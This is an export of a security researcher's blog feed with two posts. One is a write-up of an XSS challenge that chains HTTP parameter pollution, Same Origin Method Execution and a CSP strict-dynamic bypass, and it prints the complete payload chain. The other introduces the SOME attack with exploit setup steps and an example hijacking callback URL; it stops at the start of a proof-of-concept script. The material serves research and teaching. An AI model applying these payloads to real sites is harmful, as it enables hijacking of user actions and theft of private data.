tag:blogger.com,1999:blog-75345215805103572812024-03-21T15:17:58.505+02:00Ben Hayak - Security BlogWeb Security, Network Security, Reverse Engineering - Exposed[Ben Hayak]http://www.blogger.com/profile/09473158121408723877noreply@blogger.comBlogger20125tag:blogger.com,1999:blog-7534521580510357281.post-45886619773807915442020-08-14T20:45:00.060+03:002020-08-17T12:57:44.520+03:00Leveraging JSONP to SOME via HTTP Parameter Pollution<link href="//cdnjs.cloudflare.com/ajax/libs/highlight.js/10.1.2/styles/a11y-dark.min.css" rel="stylesheet"></link>
<script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/10.1.2/highlight.min.js"></script>
<script>
hljs.initHighlightingOnLoad();
</script>
<script async="" charset="utf-8" src="https://platform.twitter.com/widgets.js"></script>
<br />
<h1>Introduction</h1>
<br />
<div>
<p>
When you see a callback control in a JSONP endpoint doesn't that make you
want to execute XSS? But, there's always this "text/javascript" (or similar)
content-type that stands in the way.
</p>
<p>
During BlackHat 2014 I presented
<a href="https://www.someattack.com/Playground/About" rel="nofollow" target="_blank">Same Origin Method Execution</a>
(SOME) attack. This talk explains how to abuse callback endpoints to execute javascript methods in a vulnerable domain.
</p>
<p>
Nowadays, finding vulnerable callback endpoints got harder as passive content-types dominate the web. While the vulnerable, active content-types like "text/html", "Adobe Flash" or "ActiveX plugins" are less common.
In the second
<a href="https://conference.hitb.org/hitbsecconf2017ams/materials/D2T1%20-%20Ben%20Hayak%20-%20Advanced%20Same%20Origin%20Method%20Execution.pdf" rel="nofollow" target="_blank">SOME talk</a>
during HackInTheBox 2017, I shared the hint of my ongoing research:
</p>
<br />
<br />
<blockquote style="text-align: center;">
<span style="font-size: x-large;">"JSONP is NOT vulnerable without a chain"</span>
<br />
(<a href="https://conference.hitb.org/hitbsecconf2017ams/materials/D2T1%20-%20Ben%20Hayak%20-%20Advanced%20Same%20Origin%20Method%20Execution.pdf#page=16" rel="nofollow" target="_blank">slide 16</a>, under "What are the vulnerable endpoints?")
</blockquote>
<br /><br />
As I was always "too busy", on Jun 7, 2020, @kinugawamasato released the following tweet:
<blockquote class="twitter-tweet">
<p dir="ltr" lang="en">
I created a new XSS challenge! Can you solve it?
<a href="https://t.co/reTuO3oxjE">https://t.co/reTuO3oxjE</a>
</p>
— Masato Kinugawa (@kinugawamasato)
<a href="https://twitter.com/kinugawamasato/status/1269679108499189760?ref_src=twsrc%5Etfw">June 7, 2020</a>
</blockquote>
<br />
His callback challenge was similar and inspired me to share my research in the form of a my own XSS challenge.
<br />
</div>
<br /><br />
<h1>The Challenge</h1>
<div>
<div>
<br />
<p>
The challenge goal was: chaining HPP to SOME, then bypass a strict CSP policy and get arbitrary cross-site scripting.
</p>
<p>
For almost 2 months (Jun 18, 2020 - Aug 14, 2020) only 4 players solved it. Even though, on July 1th, Masato released the solution to his challenge.
</p>
<p>
The following is a the original tweet:
</p>
<blockquote class="twitter-tweet">
<p dir="ltr" lang="en">XSS Challenge is out! Try to trigger alert(𝒏𝒐𝒏𝒄𝒆) in
<a href="https://t.co/R2ntR1YVHV">https://t.co/R2ntR1YVHV</a>
<br />
<br />Good luck!
<a href="https://t.co/5CKzARqkZj">https://t.co/5CKzARqkZj</a>
<br />
<br />Please DM me if you find any real bugs. Enjoy!
</p>
— Ben Hayak (@BenHayak)
<a href="https://twitter.com/BenHayak/status/1273599777679249410?ref_src=twsrc%5Etfw">June 18, 2020</a>
</blockquote>
<br />
</div>
<br />
<h2 class="post-body-h2">Challenge Structure</h2>
<br />
<div>
The challenge was consisted of 3 pages:
<ol>
<li>index.html - Static Page</li>
<li>connect.php - JSONP endpoint </li>
<li>purify.js - Cure53's DOMPurify<br /> </li>
</ol><div><br /></div>
</div>
<h2 class="post-body-h2">Entry points</h2>
<div>
index.html:
<ul>
<li><strong>"client_id"</strong> - URL parameter</li>
</ul>
connect.php:
<ul>
<li>
<strong>client_id</strong> - URL parameter - Limited control of
<strong>up to 38 characters</strong> (<= 38)
</li>
<li>
<strong>callback</strong> - URL parameter:
</li>
<ul>
<li>Limited to classic callback characters:<code>[^a-z0-9.]+/i</code></li>
<li>Blocked the string "write" to avoid using "document.write"</li>
</ul>
</ul><div><br /></div>
</div>
<h2 class="post-body-h2">CSP Policy</h2>
<div>
<img data-original-height="113" data-original-width="569" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVlbpGBrV1MdG-GG9D7LzmQDFOC2jYVDMmJ4HsQLRQMWgfjeTcor321gjizqVCX9Ds0My7TYZFHYRVbtSzQjPa84-lFy9efo0vKMtATsiIpo0MV-uX5ixIHXzQ6AGRsOyfMdEJ-iFTiQA/s0/policy.png" />
<br />
The script-src directive only allow scripts with a valid nonce (I did not use a random nonce but players were instructed to assume it's dynamic for every page load).
</div>
<br />
<h2 class="post-body-h2">The Challenge Workflow</h2>
<br />
<div>
On page load the index.html page:
<ol>
<li>Calls "init();" to insert items from the <strong>rules</strong> array which is defined on the <strong>global scope. </strong></li>
<li>Calls "connect(client_id)" to trigger the JSONP endpoint at "connect.php" while appending <strong>client_id</strong> as a parameter.</li>
<li>Listen to JSONP which calls back with "<strong>callback</strong>(<strong>response</strong>, status)".</li>
<li>Render the response as HTML safely using Purify's sanitize function. </li>
</ol>
</div>
<h2 class="post-body-h2">Unintended Solution</h2>
<p>Slightly after I uploaded the challenge it was possible to skip the harder steps of the challenge as I forgot to include "base-uri 'none'" - that was quickly fixed.
</p>
</div>
<br /><br />
<br /><br />
<!--Solution-->
<h1>The Solution</h1>
<br />
<div>
<br />
<p>
To solve the challenge one had to complete several steps:
</p>
<ol>
<li>Control the method execution using a callback (SOME attack).</li>
<li>Abuse the lack of X-Frame-Options to obtain multiple method execution. </li>
<li>Inject arbitrary HTML limited to <strong>38 characters.</strong></li>
<li>Bypass CSP to execute XSS while abusing <strong>"strict-dynamic"</strong>.</li>
<li>Navigating the DOM tree to overcome character limits.</li>
</ol>
<br />
<p>
During my talk in 2017, I already published the instructions for solving steps 1-2 and
<a href="https://conference.hitb.org/hitbsecconf2017ams/materials/D2T1%20-%20Ben%20Hayak%20-%20Advanced%20Same%20Origin%20Method%20Execution.pdf#page=35" rel="nofollow" target="_blank">step 5 </a>(slide 35)
as part of SOME white paper and slides.
</p>
<p>Before we dig into the details the following is the challenge solution:</p>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRVsOJZnFlcgDLzdj3htHjzXNwLq4JxPezV0PHDazdWCATePEW5obkf6Q8FgXTIO8jSu-38c-FyBXue9CjpUpRJE_TxGdZVppGxWEFP7HLR6jSbX9ZMj04CS23Asf7AkjOSsd2wEcWGyM/s1123/solution_mini_2020.png">
<img alt="" border="0" data-original-height="856" data-original-width="1123" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRVsOJZnFlcgDLzdj3htHjzXNwLq4JxPezV0PHDazdWCATePEW5obkf6Q8FgXTIO8jSu-38c-FyBXue9CjpUpRJE_TxGdZVppGxWEFP7HLR6jSbX9ZMj04CS23Asf7AkjOSsd2wEcWGyM/s640/solution_mini_2020.png" width="100%" />
</a>
<br />
<p>
<a href="http://poc.benhayak.com/p/solutions/qr6bK579X7QYu7YfDcjLe92q/mini_2020-BenHayak.html" style="font-size: x-large;" rel="nofollow" target="_blank">Run the Solution</a>
</p>
<p>Here is a simplified version of the solution:</p>
<pre><code>top.frame.rules.push("Error: '<iframe srcdoc='<script></script>'>'","406: Not Acceptable")
top.frame.init("Error: 'x'","406: Not Acceptable")
top.frame.itemsList.lastElementChild.previousSibling.previousSibling.previousSibling.firstElementChild.contentWindow.document.head.firstElementChild.append("Error: '';parent.x=parent.document.scripts//'","406: Not Acceptable")
top.frame.itemsList.lastElementChild.previousSibling.lastElementChild.contentWindow.document.head.firstElementChild.append("Error: '';alert(parent.x[0].nonce)//'","406: Not Acceptable")
</code></pre>
<div><br /></div><br />
<span><strong><span style="font-size: x-large;">Solvers</span></strong>🎉</span>
<br /><br />
<p>
Thankfully 4 of the players were above all others and solved this challenge relatively fast! All with the intended solution, though some used shorter and cleaner code to solve.
<br />
The first to solve was <a href="https://twitter.com/kinugawamasato" name="https://twitter.com/kinugawamasato" rel="nofollow" target="_blank">@kinugawamasato</a> the great, followed by 3 other fantastic players: Roman
Shafigullin (<a href="https://twitter.com/shafigullin" rel="nofollow" target="_blank">@shafigullin</a>), terjanq (<a href="https://twitter.com/terjanq" rel="nofollow" target="_blank">@terjanq</a>) and Luan Herrera (<a href="https://twitter.com/lbherrera_" rel="nofollow" target="_blank">@lbherrera_</a>)
</p>
<br />
<h1>Deep Dive</h1>
<br>
<h2 class="post-body-h2">Method Execution via HTTP Parameter Pollution</h2>
<p>☑️ Method execution can quite simply be controlled by abusing HPP.</p>
<p>
Injecting "%26callback=alert" to the client_id parameter allows us to overwrite the "connect.php" endpoint's callback parameter and therefore get control over the method to execute.
</p>
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3r_vUiHqg9kA9T4OqPMDCsNy4P-lb2PyF0TsW-LqTWB_vivzYY11O2G634CJfAeEo-aCydnPnwgUZzmvOmYWaBE9pvA0nB51pQFBlyeJUPedEu5mj9GBxW43QSvrMEg5Fc-hxwnaeJd8/s525/method_execution.png">
<img alt="" border="0" data-original-height="157" data-original-width="525" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3r_vUiHqg9kA9T4OqPMDCsNy4P-lb2PyF0TsW-LqTWB_vivzYY11O2G634CJfAeEo-aCydnPnwgUZzmvOmYWaBE9pvA0nB51pQFBlyeJUPedEu5mj9GBxW43QSvrMEg5Fc-hxwnaeJd8/s0/method_execution.png" />
</a>
<br /> <br />
<p>This however will only execute an alert, which will not allow stealing the CSP nonce or executing arbitrary XSS.</p>
<h2 class="post-body-h2">Multiple Method Execution</h2>
<p>
Multiple Method Execution is all about constructing a gadget and reusing existing code.
</p>
<ol>
<li>Setting up 5-6 windows (iframes) based on the amount of methods we want to execute on the challenge page.</li>
<li>Abusing the JSONP endpoint with designated <strong>callback </strong>parameter by navigating each window context.</li>
<li>Controlling the execution order.</li>
</ol>
<p>I've described the impact of executing multiple methods using SOME and how it can be as bad or nearly as bad as XSS throughout the SOME white-paper.</p>
<h2 class="post-body-h2">Pushing 38 Bytes of Arbitrary HTML </h2>
<p>
The first real step of the challenge was to "plant" HTML code into a globally defined array named "<strong>rules". </strong>This could be achieved using the native <strong>Array.push </strong>function:
</p>
<pre> <code>top.frame.rules.push("Error: '<iframe srcdoc='<script></script>'>'","406: Not Acceptable")</code>
</pre>
<p>
Once we have arbitrary HTML in <strong>"rules"</strong>,
it is possible to use the JSONP endpoint again, this time to execute the <strong>"init()"</strong>
method defined in a whitelisted script. The code at "init" uses innerHTML to inject the
<strong>rules</strong> array items along with the smuggled 38 bytes of HTML payload!
</p>
Injecting the HTML:
<br />
<pre><code>top.frame.init("Error: 'x'","406: Not Acceptable")</code></pre>
We now finally have arbitrary HTML injection!
<br /><br />
<p>☑️ HTML injection (of 38 bytes)</p>
<h2 class="post-body-h2">Bypassing Content Security Policy</h2>
<p>
The server was setup to block anything but allowed scripts using the following CSP directives:
</p>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOSHF1VJi2Ukn2gH0x89dxilo1KS4qzXPQw-A-ieVm4iCLsJVkYq1WsRSqSyMCayqYWN-voBzn8DkHX8A692NOBieYX6Oj3ZxGWODjcEQRn_oVcdGfTg38lOrocoCI11GF2a_Ic3NeDqo/s569/policy.png">
<img alt="" border="0" data-original-height="113" data-original-width="569" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOSHF1VJi2Ukn2gH0x89dxilo1KS4qzXPQw-A-ieVm4iCLsJVkYq1WsRSqSyMCayqYWN-voBzn8DkHX8A692NOBieYX6Oj3ZxGWODjcEQRn_oVcdGfTg38lOrocoCI11GF2a_Ic3NeDqo/s0/policy.png" />
</a>
<p>
Reading the policy, one can spot a bold hint I left there, that is the strict-dynamic directive.
</p>
<p>
This step made quite some players struggle, as it was about abusing strict-dynamic
to make a non-"parser-inserted" script element execute javascript code.
</p>
<br />
<h3>What is strict-dynamic?</h3>
<p>
A simple explanation can be found in <a href="https://content-security-policy.com/strict-dynamic/">content-security-policy.com</a>:
</p>
<blockquote>
The key super power of strict-dynamic is that it will allow whitelisted scripts to load additional scripts via non-"parser-inserted" script elements.
<br /><br />
So how do you create a non-"parser-inserted" script element? Here's an example: <br />
<pre> <code>var s = document.createElement('script');
s.src = "https://cdn.example.com/some-script-you-need.min.js";
document.body.appendChild(s);</code>
</pre>
</blockquote>
<p>
That is a great, but at this point in the challenge executing such code is impossible.
</p>
Yet, is that the <strong>only</strong> way we can create non-parser inserted scripts?
<br /><br />
<h3><br /></h3><h3>Empty Script Nodes</h3><div><br /></div>
<p>
If we carefully read the HTML5 spec we can notice the following:
</p>
<p>
"A <a href="#">script</a> element has a <strong>parser document</strong>, which is either null or a <a href="#">Document</a>. Initially, its value must be null. It is set by the <a href="#">HTML parser</a> and the <a href="#">XML parser</a> on <a href="#">script</a> elements they insert, and affects the processing of those elements.
<a href="#">script</a> elements with non-null <a href="#">parser documents</a> are known as <strong>"parser-inserted"</strong>."
</p>
<p>
So if the script tag has content, it’s already considered as “parser inserted”.
</p>
<br />
<h3>Creating Scripts with null parser documents</h3>
<br />
<p>
The key point players had to figure out is that script tags's parser documents are initially null (<em>"Initially, its value must be null"</em>) and therefore, <strong>an empty script has a null parser document </strong>
and will not be executed by the html parser.
</p>
<p>Here how to abuse this for solving the challenge:</p>
<pre><code><iframe srcdoc='<script></script>'></iframe></code></pre>
<p>
Notice this payload is 44 bytes (>38) and is blocked by "connect.php" length limit. Luckily, we can drop the "</iframe>" and the browser will "guess" it needs to close the tag for us.
Once we have a non-parser inserted script it is now finally possible to abuse strict-dynamic.
</p>
<br />
☑️ non-parser inserted scripts
<br /><br/>
<h2 class="post-body-h2">XSS via Node.append</h2>
<p>
The final part in the challenge can be broken down into 2 main steps
</p>
<ul>
<li><a href="https://conference.hitb.org/hitbsecconf2017ams/materials/D2T1%20-%20Ben%20Hayak%20-%20Advanced%20Same%20Origin%20Method%20Execution.pdf#page=35" rel="nofollow" target="_blank">Navigate the DOM</a> to obtain a reference to the empty script, and</li>
<li>Find a method that allows adding content into the empty non-"parser inserted" script tag.</li>
</ul>
<p>
All there's left to do is to construct a valid javascript code and append it to the script node:
</p>
<pre><code>top.frame.itemsList.lastElementChild.previousSibling.previousSibling.previousSibling.firstElementChild.contentWindow.document.head.firstElementChild
// Returns a refernce to the injected <script> Node
scriptNode.append("Error: '';alert(1337)//'","...")
// Adds content to the script tag and executes</code></pre>
<br />
<p>
☑️ Bypassing CSP for arbitrary XSS
</p>
<a href="http://poc.benhayak.com/p/solutions/qr6bK579X7QYu7YfDcjLe92q/mini_2020-BenHayak.html" style="font-size: x-large;" rel="nofollow" target="_blank">Run the Solution</a>
<p>
This writeup took longer than expected but I hope you enjoy it as much as I enjoyed writing it.
</p>
<p>Thanks you all who played!</p>
</div>
[Ben Hayak]http://www.blogger.com/profile/09473158121408723877noreply@blogger.com0tag:blogger.com,1999:blog-7534521580510357281.post-44766732168463595282015-06-18T18:03:00.000+03:002015-07-16T01:06:20.494+03:00Same Origin Method Execution (SOME)<div align="center" class="MsoNormal" style="text-align: center;">
<v:shapetype coordsize="21600,21600" filled="f" id="_x0000_t75" o:preferrelative="t" o:spt="75" path="m@4@5l@4@11@9@11@9@5xe" stroked="f">
<v:stroke joinstyle="miter">
<v:formulas>
<v:f eqn="if lineDrawn pixelLineWidth 0">
<v:f eqn="sum @0 1 0">
<v:f eqn="sum 0 0 @1">
<v:f eqn="prod @2 1 2">
<v:f eqn="prod @3 21600 pixelWidth">
<v:f eqn="prod @3 21600 pixelHeight">
<v:f eqn="sum @0 0 1">
<v:f eqn="prod @6 1 2">
<v:f eqn="prod @7 21600 pixelWidth">
<v:f eqn="sum @8 21600 0">
<v:f eqn="prod @7 21600 pixelHeight">
<v:f eqn="sum @10 21600 0">
</v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:formulas>
<v:path gradientshapeok="t" o:connecttype="rect" o:extrusionok="f">
<o:lock aspectratio="t" v:ext="edit">
</o:lock></v:path></v:stroke></v:shapetype><v:shape id="Picture_x0020_4" o:spid="_x0000_i1027" style="height: 143.4pt; mso-wrap-style: square; visibility: visible; width: 81.6pt;" type="#_x0000_t75">
<v:imagedata o:title="logo" src="file:///C:\Users\bhayak\AppData\Local\Temp\msohtmlclip1\01\clip_image001.png">
</v:imagedata></v:shape><o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="MsoNormal">
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGWOQCOMEMXLDM7PiiOZtoJfpVg9Ga73RuSoAfV27DHOGidJY1GSxg3Lc0lYORwFJh_EJHQt9yHtYq9PN1YhkzM6PyGCHkIzdrsX2mx4jmkYXDp6mlkUCVQugcM288RxvHw223PKaf2EY/s1600/logowhite.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;" target="_blank"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGWOQCOMEMXLDM7PiiOZtoJfpVg9Ga73RuSoAfV27DHOGidJY1GSxg3Lc0lYORwFJh_EJHQt9yHtYq9PN1YhkzM6PyGCHkIzdrsX2mx4jmkYXDp6mlkUCVQugcM288RxvHw223PKaf2EY/s320/logowhite.png" width="182" /></a></div>
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">This blog post is a brief presentation of <span style="color: #e69138;"><b>"Same Origin Method
Execution" (SOME)</b></span>. SOME is a web application attack which abuses callback endpoints (mainly <b>Flash </b>applets and <b>JSONP </b>endpoints to which OAuth dialogs often redirect to -- redirect_uri) by forcing a victim into executing arbitrary scripting methods of any page on the endpoint’s domain. The impact of a SOME attack is similar to the impact of Cross-Site Scripting, though there are some important and distinguishing exploitation restrictions. In spite of limitations, it is vital and valid to say that the attack is not limited to a specific web functionality/page nor confined in terms of UI or HTTP response headers. In fact, using a payload of <b>only alphanumeric characters and a dot</b> will allow attackers to hijack dangerous web functionality and even exfiltrate sensitive user data such as private photos and/or videos. </span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">Popular domains like <span style="color: #e69138;">Google, Yahoo, Microsoft</span> (plus.google.com, maps.yahoo.com, yammer.com and so on) along with the very popular platforms - <span style="color: #e69138;">Wordpress</span> and <span style="color: #e69138;">VideoJS </span><o:p></o:p>(which turned <b>numerous domains vulnerable</b> to SOME) were affected by SOME. Many were recently fixed (responsible disclosure details are mentioned below).</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: x-large; line-height: 25.6800003051758px;"><b>Paper, Demo and Slides from BlackHat</b></span></span><br />
<b><span style="font-family: Arial, Helvetica, sans-serif; font-size: large; line-height: 107%;"><br /></span></b></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">If you wish to invest your time in exploring the fascinating technical details in-depth, you are encourage to read my <b><a href="http://files.benhayak.com/Same_Origin_Method_Execution__paper.pdf" target="_blank"><span style="color: #ffd966; font-family: Arial, Helvetica, sans-serif;">white-paper</span></a> </b><a href="https://www.blackhat.com/docs/eu-14/materials/eu-14-Hayak-Same-Origin-Method-Execution-Exploiting-A-Callback-For-Same-Origin-Policy-Bypass-wp.pdf" target="_blank"><span style="color: #fff2cc; font-family: Arial, Helvetica, sans-serif; font-size: x-small;">(mirror)</span></a>, or look at the updated Black-Hat <a href="https://www.slideshare.net/BenHayak/blackhat-eu-same-origin-method-execution" target="_blank">presentation</a>. The slides include a demonstration video of a SOME exploit - you can see how I used SOME to hijack Google cloud’s private photo and video albums. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">By the way, you can also find more details about the breach I am talking about in my previous blog post: <a href="http://www.benhayak.com/2015/05/stealing-private-photo-albums-from-Google.html" target="_blank">Stealing private photo albums from Google</a></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<br />
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 17.1200008392334px;"><b>Attack Scenario:</b></span></span><br />
<b><span style="font-family: Arial, Helvetica, sans-serif; font-size: 12.0pt; line-height: 107%;"><br /></span></b></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">To understand the SOME attack we first need to cover some general aspects, so bear with me:</span></div>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l0 level1 lfo3; text-indent: -18.0pt;">
<ul>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Web browsers allow execution of a variety of methods without considering the given arguments, for example: <i>form1.submit(“ignored”,”ignored”);</i> will evaluate exactly as the following natural version: f<i>orm1.submit();</i> will. Therefore, an external control over the prefix/padding before the parenthesis (as often given by many callback implementations) would be enough for <b>hijacking dangerous web functionality </b>regardless of the arguments.</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">In an environment with multiple windows and their respective documents, redirecting any of the documents will re-enforce Same Origin Policy to restrict cross-site window documents’ DOM access. However, <b>web browsers would not delete memory references to other window objects post-redirection</b>. For instance, whenever a document opens a popup window, the browser will add a memory reference pointing to this document and save it as the <b>window.opener</b> property of the new window. Regardless of any redirections this reference would continue to work unless it is explicitly deleted or destroyed.</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Most callbacks endpoints are designed to only allow a limited set of characters as a callback parameter value. This is commonly done by the following regex [a-zA-Z0-9_\.], or in other words, a char-set consisting of alphanumeric, a dot and an underscore. Let me add that crafting a SOME exploit requires only alphanumeric and a dot charset. </span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Interaction between different browsing contexts is often applied via callback execution. For instance, <b>Flash applets</b> and/or other callback endpoints (e.g. <b>OAuth dialogs</b>) commonly execute a callback function to <b>notify events</b> to a different browsing context. As a result, in cases where this callback can be controlled via a HTTP parameter, an attacker would be able to control and replace the <b>execution browsing context</b> (e.g. by redirecting the opener window document). Analogically, the <b>function/method</b> that the interpreter executes could also be controlled by the attacker.</span></li>
</ul>
</div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo3; text-indent: -18.0pt;">
<span style="font-family: Arial, Helvetica, sans-serif;"><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">Same Origin Method Execution abuses the nature of user agents by forging a setup of windows/frames, in turn redirecting their documents. Using references created by this setup within a callback parameter will allow replacing the execution context with a targeted document and hijacking an existing web functionality within it.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: large;"><span style="line-height: 25.6800003051758px;"><b>Manipulating a Surface for Method Execution</b></span></span></div>
<div class="MsoNormal">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><span style="font-family: Arial, Helvetica, sans-serif;"><b>Initial steps:</b></span></div>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l2 level1 lfo1; text-indent: -18.0pt;">
<ol>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Firstly, the attacker has to detect a vulnerable instance - either a plugin or a vulnerable callback endpoint document. A vulnerable instance is the one that leads the browser’s interpreter towards active execution of a function name supplied by a (callback) parameter value.<br /><i>Note: Instances that respond with passive mime types like application/json are not vulnerable when accessed directly.</i> </span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">In the second preparatory step the attacker has to choose a target webpage hosted on the same domain (http://www.vulnerable-domain.com/photoAlbums). Aiming at hijacking a web functionality (e.g. object method, javascript function) of this target webpage, the attacker shall assemble a reference using DOM navigation or a direct reference pointing to it, for example: </span><span style="font-family: Arial, Helvetica, sans-serif;"><i>document.body.privateAlbum.firstChild.nextElementSibling.submit</i></span></li>
</ol>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Setting up the Exploit:</b></span><br />
<ol>
<li><span style="font-family: Arial, Helvetica, sans-serif;">For setting up SOME and creating the appropriate window references, one has to create an exploitation surface/environment by opening a new browsing context (WIN1).</span></li>
<div class="separator" style="clear: both; text-align: center; width: 100%;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwJTWykjsc5UxIocWaBe8A1MwHNBW-gaxVgPMsD2qP4YSMxIXr_K1MhrZL_YDS4XKfUiQ6AFJEo6f8x3Fvkig_7W4djFjLVjYPlcxSTXffngUf8l9IO62WhmSDK2HfGBw3bUlq1aaqbgw/s1600/blog_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;" target="_blank"><img border="0" height="100%" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwJTWykjsc5UxIocWaBe8A1MwHNBW-gaxVgPMsD2qP4YSMxIXr_K1MhrZL_YDS4XKfUiQ6AFJEo6f8x3Fvkig_7W4djFjLVjYPlcxSTXffngUf8l9IO62WhmSDK2HfGBw3bUlq1aaqbgw/s640/blog_1.png" width="95%" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Once the environment is ready, the initiating page (MAIN) shall redirect its document to any desired target page on the endpoint’s domain (http://www.vulnerable-domain.com/target_document).</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Following the redirection, the new browsing context (WIN1) shall wait for the targeted document’s DOM loading completion.</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Once ready, for hijacking a method execution, the new browsing context (WIN1) would <b>redirect its document to the vulnerable instance</b> set with an arbitrary callback parameter, for example:<br /><br /><span style="color: #6fa8dc;">http://www.vulnerable-domain.com/flash-plugin.swf?callback=</span></span><span style="font-family: Arial, Helvetica, sans-serif;">opener.document.body.privateAlbum.firstChild.nextElementSibling.submit</span></li>
</ol>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><o:p></o:p></span></div>
<div class="MsoListParagraphCxSpLast" style="mso-list: l2 level1 lfo1; text-indent: -18.0pt;">
<span style="font-family: Arial, Helvetica, sans-serif;"><o:p></o:p></span></div>
<div class="MsoListParagraph" style="mso-list: l2 level1 lfo1; text-indent: -18.0pt;">
<span style="font-family: Arial, Helvetica, sans-serif;"><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><v:shape id="Picture_x0020_1" o:spid="_x0000_i1026" style="height: 196.2pt; mso-wrap-style: square; visibility: visible; width: 431.4pt;" type="#_x0000_t75">
<v:imagedata o:title="" src="file:///C:\Users\bhayak\AppData\Local\Temp\msohtmlclip1\01\clip_image002.png">
</v:imagedata></v:shape><b><o:p></o:p></b></span></div>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l2 level1 lfo1; text-indent: -18.0pt;">
<span style="font-family: Arial, Helvetica, sans-serif;"><o:p></o:p></span></div>
<div class="MsoListParagraphCxSpLast" style="mso-list: l2 level1 lfo1; text-indent: -18.0pt;">
<span style="font-family: Arial, Helvetica, sans-serif;"><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">Demo of designating the execution context for executing an alert:<br /><br /><o:p></o:p></span><br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGRSqe1sKZXsHVxXH6MnxJ3TZ62vJAUWQlygQzG1qub7egQhU_Io6B8YEr4PdxBbBTjEw9gJVbZgEN0-oALRxXuxzyhLkdmgcDEI0DbQIbbwSWFfBuGKBdp7h9g9CUjc_RsE-h9AF38nE/s1600/blog_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;" target="_blank"><img border="0" height="100%" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGRSqe1sKZXsHVxXH6MnxJ3TZ62vJAUWQlygQzG1qub7egQhU_Io6B8YEr4PdxBbBTjEw9gJVbZgEN0-oALRxXuxzyhLkdmgcDEI0DbQIbbwSWFfBuGKBdp7h9g9CUjc_RsE-h9AF38nE/s1600/blog_2.png" width="95%" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br /></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<br />
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b><span style="font-family: Arial, Helvetica, sans-serif;">PoC:<o:p></o:p></span></b></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">@Main Page:</span></div>
<div class="MsoNormal">
<div style="background: #202020; border-width: 1px; border: solid gray; overflow: auto; padding: .2em .6em; width: auto;">
<pre style="line-height: 125%; margin: 0;"><span style="color: #6ab825; font-weight: bold;"><script></span>
